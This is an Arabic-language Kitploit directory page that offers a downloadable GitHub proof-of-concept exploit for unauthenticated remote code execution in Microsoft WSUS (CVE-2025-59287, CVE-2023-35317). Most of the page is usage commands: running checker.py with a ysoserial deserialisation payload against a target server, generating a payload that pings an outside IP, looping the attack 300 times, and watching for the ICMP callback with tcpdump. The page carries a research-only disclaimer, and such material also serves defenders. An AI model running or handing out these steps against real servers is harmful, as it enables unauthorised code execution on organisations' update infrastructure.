Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59287-PoC — إثبات مفهوم (PoC) لثغرة RCE غير مصادق عليها في Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317 | Kitploit
أدوات/GitHubGitHub/m507/cve-2025-59287-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubm507/cve-2025-59287-poc

CVE-2025-59287-PoC

إثبات مفهوم (PoC) لثغرة RCE غير مصادق عليها في Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317

عرض المستودع
143منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم CVE-2025-59287 / CVE-2023-35317

داخل CVE-2025-59287: SoapFormatter RCE في WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/

أُنشئ هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، ولا يُقصد استخدامه لمهاجمة الأنظمة إلا في الحالات المصرَّح بها صراحةً. لا يتحمل القائمون على المشروع أي مسؤولية أو تبعة تجاه سوء استخدام البرنامج. استخدمه بمسؤولية.

الاستخدام

الخيارات المطلوبة:

  • --target-url – عنوان URL الأساسي لخادم WSUS المستهدف، مثال: http://WIN-246JC0TE3BB.vuln.local:8530
  • --cve – أحد القيمتين CVE-2023-35317 أو CVE-2025-59287

الخيارات الاختيارية:

  • --dns-name – اسم DNS للعميل المستخدم في طلبات SOAP (الافتراضي: bugcrowd.local)
  • --random – أضف بادئة نطاق فرعي عشوائي إلى --dns-name بحيث يظهر كل تشغيل كعميل جديد
  • --payload – حمولة ysoserial مخصصة مرمّزة بـ base64؛ إذا حُذفت، تُستخدم الحمولة المدمجة لقيمة --cve المختارة
  • --debug – تفعيل تسجيل تصحيح مفصّل (أسطر [DEBUG])

CVE-2025-59287

  1. python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random

alt text

التشغيل اليدوي – CVE-2023-35317

  1. (اختياري) أنشئ حمولة باستخدام Ysoserial.Net إذا كنت لا تريد استخدام الحمولة المدمجة (أو اعتمد على الحمولة المدمجة).
  2. شغّل: python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random
  3. افتح وحدة تحكم WSUS

alt text

التشغيل التلقائي – CVE-2023-35317

  1. ./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (أو اعتمد على الحمولة المدمجة لقيمة --cve CVE-2023-35317)
  2. for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done
  3. انتظر من 1 إلى 3 دقائق وستنشأ العملية ضمن عملية الخدمة.
  4. راقب اتصالات ICMP: sudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done

alt text

تنزيل الأداة